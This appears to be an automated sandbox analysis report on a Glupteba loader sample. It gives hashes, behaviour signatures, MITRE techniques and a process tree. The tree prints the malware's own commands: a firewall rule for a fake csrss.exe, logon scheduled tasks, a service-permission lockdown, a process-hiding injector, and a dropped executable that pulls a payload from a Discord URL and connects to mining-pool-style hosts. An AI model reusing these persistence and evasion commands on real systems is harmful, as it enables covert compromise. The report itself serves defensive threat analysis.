Analysis
-
max time kernel
274s -
max time network
280s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
16/05/2024, 23:41
General
-
Target
93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179.exe
-
Size
4.1MB
-
MD5
1f18aa563fb29bfc1802e132671b71cb
-
SHA1
31ac19c5fa39b6c84fd346cd5723d9b70054760b
-
SHA256
93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179
-
SHA512
e41951019e2a9938775652b0dc02ba1f0498a6c7f285be4fa970c80312a2522e00d122cd1caf0706f6b1620a09860d7ce60557144dcf469c3590a3c5db28bc8a
-
SSDEEP
98304:57Q/SQwuzKI7n1f7UEzJef5h6AaLO/fo54RSc8+DhQmrIF5K:irwcSE03bE+DhQdc
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 30 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 18 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Using powershell.exe command.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179.exe"C:\Users\Admin\AppData\Local\Temp\93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179.exe"C:\Users\Admin\AppData\Local\Temp\93f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
-
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1003KB
MD556e3f1780da67c94bc12989b6809263b
SHA120fa1e2d0586ca04c2c6bd12bf32535a4ae3beb9
SHA256fbe1c03323da4c936f558a645bb52bcf8421ce065d3a11e649f3bc47a719e38d
SHA5124f14b06d02c48503c4b1dda40ee6f58a3de7c9d3a8442dd1d2da421111fcf60d8d59dd720fc3e60bfc97f3e2e7741c65b3003add4bbeb57acbb48a23be9b42f0
-
Filesize
627KB
MD5dfa5b05cda04e7019c2cd3641f1a4c76
SHA10c1eaaeed93c1768375790b8aab1cba56d92003d
SHA25647a7339053a18a9937cf5a786ba671175f11bdb8cc29f21f901dd7de867acb1c
SHA5124e3bc5c015ff81dc215ccadb39bb609ba6e4193963bc11f5ae6cc745ba9ca4ed3cf3ad92b12cd2626cff1e1f62078110a186d1002c9428f6a31ed4014ca7cfae
-
Filesize
1.4MB
MD546b8050b7d9c18a699c9d0dbe103a530
SHA1ea14a2fd2027681fbef3bd22e22a7bc3f9851dcf
SHA2564701713b71f85215258c83c8942456dcead4861a32dbb39bb68d76d8fc02c74d
SHA512f47bc3c12cd596a7a2b790a6c9461281d3a01756deab055b769e10197a09ba44837be27886ff46ba56ec2a3a29058a2fe1de577c96bb7be7e6da653b91ee9a5c
-
Filesize
1.5MB
MD568f27ec0c559ad88e2e134b1cbb4acc2
SHA1c5502d1555796776592fae8cdba04b18e31bacd9
SHA2566d1dca5dc5163185792c3de4acd4de3c4c2beff2c63f0334d49e6d41d32bfb03
SHA51296d77a87fbc311df3cd8abe1ad091e1eeed8321b27da10777dac474acf38f5ffd1d8a375a06eb476f7bfa605ac2125e5e2b3cdc2e3387a6669e94cedd98fc1f8
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD580768132a569ca14934ee9983cb66264
SHA11b797c9354b01e4773b52f52de201a90d6e8e440
SHA2564b987452cd138c07e4d16a7fbf0665376fd9c84fc6703ab3dcd13d1dd8a82c3f
SHA51261cf8dc1eca45c51b9355a77b998929e57d2f133f251804e8c6a6ff86bac68c1205137e2467dea413e2d358082bd1144dc5eec5ac0057b52b3828b2a27c1412d
-
Filesize
18KB
MD53d4740dee5896717e625ed3f177777e4
SHA1964691f73b40cad8ba87bd3f606a67c38761001f
SHA256bb0766d1b513d6231d130d91389efaa64d316f337629fbfd315cbd5c7a094a56
SHA512897989f4e22fa271fa9d3c5216d97666293c359680e9703f14037032cc5fb59d77d237c8985030a938327c99a42e10cd4a56566c8b875f7e0c2595023fea9c1f
-
Filesize
18KB
MD53af946ec43397db1fb5d54dbab7c6317
SHA18c73862cc2234ca927edc862a61805ab4f72e38b
SHA256b779b627a15d24754723bb298fb93e34df9f69b6e78a9af945aaf9655662f72b
SHA512db8a33e9b9bc5233c349cd49c55cef8af30767174399ba72955236a2f4a7933c03138a3717617da240ec91d3024d60de0a7ebf1343110ea29dd923f14eb75e05
-
Filesize
18KB
MD5bd0c0e9a5cb3426a69fd03d3406fbd9d
SHA191287914470f6a2434c91fc17f47cb11cef7686e
SHA256aa8a4d3b38a7137bf8faa8c8fde4d406c904bac33aaa5bc3e9f8526734a701d7
SHA5128908f338539cef60de31b4e55a47adebbf5a0ca473e3f8bbd6fbf0245a1814677701182f18f666c6419202e9cca00aaf31908d8ed408d9ed7046414fb7684d48
-
Filesize
18KB
MD50af8555987c905b8234b251205160269
SHA11aadcc4644177cdbe678b11189dedf2a036cef2e
SHA256e70e52fca175887781893a1e5c93959a24f6ed7d135e2baebb10f1713df5a5a4
SHA51234ff64fc7a6c6159c6303bd2d99746d6fa4d2771b003ab8a2cb8bfabc3e588b4f29c5742ac6f877f4f46173c93603c536d78d3f69ef166d44e250371bd3fdd97
-
Filesize
18KB
MD51f6b4a59e16e4db541dc923b4630f37e
SHA1965d5ce1814f160923f8b5b08b920d91cbcec784
SHA2563b38233183ae050feb7cd95168c7dcf462006950db75dedf738c14bf40de2ab8
SHA51200ae6cf602449d3dd3895d42073ae38e154912c9431d275826d1bef21ca017547da675a817ca177b8b05ae65e1eb16ba084e7c96730e413820513084ca24264e
-
Filesize
18KB
MD524d59b3c012560f5d7c20b68dcf8881b
SHA145b47c0f930a42b3c1fc10adf96eab8a15ca53ee
SHA256f35bf90bdd2d7e047ec1bd23d01d3ce7aee4f010c4cb6a48d97f703f19b13881
SHA512d0efb5df7ec47a4376c5bca2fb28f2554a930160cb4ca4fef502c5148d91437a9d0cc21f1935222e79dbca8bbf4918e856814e6f55b594fb67b43231279ac42a
-
Filesize
18KB
MD5f1ce64bc65876ff4c484f983eba54d8d
SHA1b4645f5812017e973440659c2cf864e5b482f86b
SHA256c0f9f500bb6c0432bc1ce479b46e28b9977f656e8f7fc53d24733be92446f559
SHA512bce90cdd0ac5991697e52fadc15bd26fa2d03aadcf90dbd9e63839fc2e718da71edc067aac4873d4439377bdce24849e88fce8c4a1bb525a4f084276c3f0ae29
-
Filesize
4.1MB
MD51f18aa563fb29bfc1802e132671b71cb
SHA131ac19c5fa39b6c84fd346cd5723d9b70054760b
SHA25693f5828650191d45cd4f1f2460bea1d52eeeff2b0f9de7a4bb485ae14935c179
SHA512e41951019e2a9938775652b0dc02ba1f0498a6c7f285be4fa970c80312a2522e00d122cd1caf0706f6b1620a09860d7ce60557144dcf469c3590a3c5db28bc8a
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
8.9MB
-
Filesize
4.0MB
-
Filesize
8.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
9.1MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
112KB
-
Filesize
32KB
-
Filesize
6.9MB
-
Filesize
592KB
-
Filesize
204KB
-
Filesize
300KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
472KB
-
Filesize
240KB
-
Filesize
104KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
6.9MB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
216KB
-
Filesize
4.9MB
-
Filesize
4.9MB